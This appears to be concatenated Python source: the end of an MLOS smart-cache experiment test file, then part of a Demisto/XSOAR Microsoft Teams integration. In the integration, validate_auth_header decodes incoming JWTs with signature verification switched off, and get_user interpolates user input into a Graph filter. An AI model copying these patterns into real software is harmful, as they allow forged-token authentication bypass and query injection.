epsilon_ms = 10
def _process_clock_event(elapsed_time_ms):
assert elapsed_time_ms + epsilon_ms > timeout_ms
self.logger.debug(f"Processed clock event. Elapsed time: {elapsed_time_ms}")
timer = Timer(
timeout_ms=timeout_ms,
observer_callback=_process_clock_event,
epsilon_ms=epsilon_ms
)
timer_experiment = MlosExperiment(
smart_component_types=[],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(timer_experiment)
time.sleep(1)
self.mlos_agent.stop_experiment(timer_experiment)
def test_setting_random_configs_for_smart_cache_workload(self):
workload_duration_s = 1
# Let's launch the smart_cache_workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
def _set_random_workload_configuration(elapsed_time_ms):
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
def test_setting_random_configs_for_smart_cache(self):
workload_duration_s = 5
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
smart_cache_workload_thread.join()
self.mlos_agent.stop_experiment(smart_cache_experiment)
def test_setting_random_configs_for_smart_cache_and_for_smart_cache_workload(self):
""" Enables two experiments at once: one to set the cache parameters, the other to set the workload parameters.
:return:
"""
workload_duration_s = 2
# Let's create the workload
smart_cache_workload = SmartCacheWorkloadGenerator(logger=self.logger)
self.current_workload_config_values = smart_cache_workload.current_config.values
##################################################################################
# Let's configure the expriment changing the workload configuration
def _set_random_workload_configuration(elapsed_time_ms):
# First check that the config has been consumed
#if smart_cache_workload.current_config.values != self.current_workload_config_values:
# print("Put breakpoint here.")
#assert smart_cache_workload.current_config.values == self.current_workload_config_values
new_config_values = SmartCacheWorkloadGenerator.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCacheWorkloadGenerator,
new_config_values=new_config_values
)
self.current_workload_config_values = new_config_values
workload_timer = Timer(
timeout_ms=100,
observer_callback=_set_random_workload_configuration
)
random_workload_config_experiment = MlosExperiment(
smart_component_types=[SmartCacheWorkloadGenerator],
telemetry_aggregators=[workload_timer]
)
self.mlos_agent.start_experiment(random_workload_config_experiment)
##################################################################################
# Now let's configure the smart cache tuning experiment
def _set_random_cache_configuration(elapsed_time_ms):
""" This is where we would potentially query the optimizer.
:param elapsed_time_ms:
:return:
"""
new_config_values = SmartCache.parameter_search_space.random()
self.mlos_agent.set_configuration(
component_type=SmartCache,
new_config_values=new_config_values
)
current_estimate = working_set_size_estimator.estimate_working_set_size()
self.logger.info(f"Estimated working set size: {current_estimate.chapman_estimator}")
cache_config_timer = Timer(
timeout_ms=200,
observer_callback=_set_random_cache_configuration
)
working_set_size_estimator = WorkingSetSizeEstimator()
smart_cache_experiment = MlosExperiment(
smart_component_types=[SmartCache],
telemetry_aggregators=[cache_config_timer, working_set_size_estimator]
)
self.mlos_agent.start_experiment(smart_cache_experiment)
##################################################################################
# Let's launch the smart_cache_workload
smart_cache_workload_thread = Thread(target=smart_cache_workload.run, args=(workload_duration_s,))
smart_cache_workload_thread.start()
time.sleep(workload_duration_s)
self.mlos_agent.stop_experiment(smart_cache_experiment)
self.mlos_agent.stop_experiment(random_workload_config_experiment)
smart_cache_workload_thread.join()
all_registered_mlos_objects = set((component_type, runtime_attributes) for component_type ,runtime_attributes in self.mlos_agent.enumerate_active_smart_components())
assert (
(smart_cache_workload.mlos_object.owning_component_type, smart_cache_workload.mlos_object.owning_component_runtime_attributes)
in all_registered_mlos_objects
)
del smart_cache_workload
self.mlos_agent.stop_all()
all_registered_mlos_objects = set(mlos_object for mlos_object in self.mlos_agent.enumerate_active_smart_components())
if len(all_registered_mlos_objects) != 0:
print("Put breakpoint here")
assert len(all_registered_mlos_objects) == 0
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
from traceback import format_exc
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
INCIDENT_NOTIFICATIONS_CHANNEL = 'incidentNotificationChannel'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Unknown': 0,
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = get_integration_context()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
set_integration_context(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph', params: Optional[Dict] = None
) -> Union[dict, list]:
"""A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
Args:
method (str): any restful method
url (str): URL to query
json_ (dict): HTTP JSON body
api (str): API to query (graph/bot)
params (dict): Object of key-value URL query parameters
Returns:
Union[dict, list]: The response in list or dict format.
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL,
params=params,
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
adi_health_human_readable: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results({
'ContentsFormat': formats['json'],
'Type': entryTypes['note'],
'HumanReadable': adi_health_human_readable + mirrored_channels_human_readable,
'Contents': adi_health_human_readable + mirrored_channels_human_readable
})
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt=jwt_token, options={'verify_signature': False})
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = get_integration_context()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True,
'verify_signature': False,
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
set_integration_context(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = get_integration_context()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_user(user: str) -> list:
"""Retrieves the AAD ID of requested user
Args:
user (str): Display name/mail/UPN of user to get ID of.
Return:
list: List containing the requsted user object
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
params = {
'$filter': f"displayName eq '{user}' or mail eq '{user}' or userPrincipalName eq '{user}'",
'$select': 'id'
}
users = cast(Dict[Any, Any], http_request('GET', url, params=params))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user[0].get('id'))
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_meeting(user_id: str, subject: str, start_date_time: str, end_date_time: str) -> dict:
"""
Creates a Microsoft Teams meeting
:param user_id: The User's ID
:param subject: The meeting's subject
:param start_date_time: The meeting's start time
:param end_date_time: The meeting's end time
:return: Dict with info about the created meeting.
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users/{user_id}/onlineMeetings'
request_json: dict = {
'subject': subject
}
if start_date_time:
request_json['startDateTime'] = start_date_time
if end_date_time:
request_json['endDateTime'] = end_date_time
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
return channel_data
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def create_meeting_command():
subject: str = demisto.args().get('subject', '')
start_date_time: str = demisto.args().get('start_time', '')
end_date_time: str = demisto.args().get('end_time', '')
member = demisto.args().get('member', '')
user: list = get_user(member)
if not (user and user[0].get('id')):
raise ValueError(f'User {member} was not found')
meeting_data: dict = create_meeting(user[0].get('id'), subject, start_date_time, end_date_time)
thread_id = ''
message_id = ''
if chat_info := meeting_data.get('chatInfo', {}):
thread_id = chat_info.get('threadId', '')
message_id = chat_info.get('messageId', '')
participant_id, participant_display_name = get_participant_info(meeting_data.get('participants', {}))
outputs = {
'creationDateTime': meeting_data.get('creationDateTime', ''),
'threadId': thread_id,
'messageId': message_id,
'id': meeting_data.get('id', ''),
'joinWebUrl': meeting_data.get('joinWebUrl', ''),
'participantId': participant_id,
'participantDisplayName': participant_display_name
}
result = CommandResults(
readable_output=f'The meeting "{subject}" was created successfully',
outputs_prefix='MicrosoftTeams.CreateMeeting',
outputs_key_field='id',
outputs=outputs
)
return_results(result)
def get_participant_info(participants: dict) -> Tuple[str, str]:
"""
Retrieves the participant ID and name
:param participants: The participants in the Team meeting
:return: The participant ID and name
"""
participant_id = ''
participant_display_name = ''
if participants:
user = participants.get('organizer', {}).get('identity', {}).get('user', {})
if user:
participant_id = user.get('id')
participant_display_name = user.get('displayName')
return participant_id, participant_display_name
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = get_integration_context()
